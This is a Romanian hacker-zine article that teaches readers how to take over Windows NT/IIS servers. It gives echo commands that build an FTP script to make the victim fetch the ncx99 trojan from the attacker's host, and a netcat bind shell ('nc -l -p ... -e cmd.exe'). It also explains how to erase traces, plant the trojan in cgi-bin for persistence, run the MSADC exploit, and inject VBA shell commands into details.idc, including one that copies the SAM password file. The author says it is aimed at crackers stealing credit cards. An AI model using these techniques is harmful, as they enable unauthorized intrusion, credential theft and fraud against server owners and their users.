Din cate am vazut in numerele anterioare ale revistei s-au mai discutat tehnici de penetrare NT (FP, iishack)... In acest numar pe langa descrierea generala a unor exploituri vom vorbi despre cum sa controlam eficient un server NT.

Acest material e impartit in 2 parti:

1. Instalarea trojanului ncx99 cu ajutorul comenzilor echo.
2. Exploituri prin care putem da comenzi serverelor NT.

1.

Sa zicem ca puteti da cate o comanda serverului NT insa fara sa vedeti outputul... Cum uploadati si rulati trojanul ncx99 ? cazul asta nu este deloc ipotetic pentru ca sunt o gramada de exploituri care ne lasa sa dam cate o singura comanda serverului fara a vedea outputul...

Cea mai evidenta solutie ar fi pornirea FTP-ului, insa ftp.exe e un client interactiv care necesita diferite comenzi dupa pornirea sa... Noroc ca aceste comenzi se pot da si dintr-un fisier de comenzi... Dar cum creem fisierul acela ? pai simplu prin comenzi echo... Dar sa vedem cum se materializeaza asta in practica:

1. Porniti un daemon FTP pt windows (eu folosesc Serv U FTP, cautati pe altavista.com)... teoretic ar trebuii sa mearga si cu FTP-ul de linux insa din motive inca necunoscute wuftp-ul din linux nu e bun pentru aceasta sarcina.
2. Dupa ce ati pornit Serv U FTP sau alt daemon de ftp creati un user apoi puneti in directorul userului fisierul ncx99.exe
3. Acum e vremea sa creati fisierul de comenzi... acesta trebuie sa arate in felul urmator

open ip.ul.vostru.ro #ip-ul calculatorului pe care e instalat FTP-ul
user #userul in directorul caruia se afla ncx99.exe
password #parola acestui user
get ncx99.exe #necesita explicatii ?
quit #nu ignorati nici aceasta comanda

pentru a-l creea cu echo vom da urmatoarele comenzi

echo open ip.ul.vostru.ro > comenzi
echo user >> comenzi
echo password >> comenzi
echo get ncx99.exe >> comenzi
echo quit >> comenzi

in momentul asta avem un fisier "comenzi" care contine comenzile necesare ftp-ului... pentru a-l rula tastam

ftp -s:comenzi

Acum ar trebui sa vedem cum serverul victima se conecteaza la noi si downloadeaza fisierul ncx99.exe acum trebuie sa mai dam comanda "ncx99" si ne putem conecta la serverul victima pe portul 99. In caz ca din anumite motive nu putem sau nu vrem sa folosim ncx99 putem folosi netcat-ul original (ncx99 e defapt o versiune modificata a netcatului pt widnows) pentru a folosi netcat (nc.exe), dupa uploadare trebuie sa dam comanda:

nc -l -p numarul_portului_pe_care_vrem_sa_ruleze -e cmd.exe

Iar acum ne telnetam pe portul ales de noi si e exact acelasi lucru ca si ncx99, adica primim un prompt de genul:

C:\WINNT\SYSTEM32>

Primul lucru care ar trebuii sa il facem e sa stergem fisierul "comenzi" deoarece acesta contine logurile, apoi am mai putea copia ncx99.exe in directorul cgi-bin al serverului pentru a-l putea executa tot timpul din browser (http://www.serverNT.exe/cgi-bin/ncx99.exe apoi asteptam pana scrie "Waiting for reply" si ne conectam pe portul 99). De aici cred ca va descurcati voi... ca doar sunteti hackeri ce mama dreaqului ? :))))
Ok acum ca stim toate astea sa vedem ce exploituri putem folosi pentru a da comenzi remote.

2. Exploituri

MSADC
E unul din cele mai raspandite exploituri pentru IIS 4.0, cred ca cei mai multi il cunosc deja deci nu o sa insist prea mult la faza asta. Downloadati msadc2.pl de pe packetstorm.securify.com dupa care rulati "perl msadc2.pl -h www.siteNT.com"... Daca aveti noroc vi se va cere sa introduceti o comanda.... Stiti ce trebuie sa faceti in acest
moment :).

SQL
Aceasta vulnerabilitate rezida in faptul ca in anumite comenzi pentru baze de date SQL se pot introducer comenzi VBA (Visual Basic)... Cu ce rezultate vom vedea. Cele mai afectate sunt fisierele .idc care permit introducerea usoara a comenzilor VB si nu numai...
Spre exemplu daca vrem sa stim unde anume este directorul web al serverului nu trebuie decat sa incarcam in browser pagina: http://www.siteNT.com/fuck_romtelecom.idc
asta ne va da o eroare care ne va spune ca nu exista fisierul C:\inetpub\wwwroot\fuck_romtelecom.idc Fain, nu-i asha ? acum macar stim unde e directorul web...

Dar asta inca nu e asha de periculos ca si introducerea comenzilor VB in fisiere .idc... pentru asta avem nevoie de un fisier .idc existent si de anumiti parametrii pentru a sti unde trebuie bagat VBA care arata cam asha:
|shell("cmd /c copy c:\winnt\repair\sam._ c:\inetput\wwwroot")|
Aceasta comanda va copia (daca permisiile nu sunt setate bine) Unul dintre cele mai des intalnite fisiere .idc e details.idc care se afla in /scripts/samples/details.idc... Pentru a da o comanda ne ducem la URL-ul:

www.serverNT.com/scripts/samples/details.idc?Fname=hi&Lname=|shell(\"COMANDA")

Ce comenzi vom da ? pai asta ar trebuii sa stiti deja... Oricum astea sunt doar 2 dintre cele mai folosite exploituri de IIS... exista si alte exploituri si sunt convins ca vor mai aparea altele care ne vor lasa sa dam asemenea comenzi cu diferite drepturi (admin sau guest, pt nt e cam tot una :)))

Eh, cam asta ar fi... Ar mai trebuii sa precizez ca aceste informatii nu sunt destinate Administratorilor sau oamenilor care vor sa se informeze ci crackerilor care vor sa sparga 20 de site-uri pe zi si sa fure carti de credit cu care sa comande laptopuri si celulare... :)))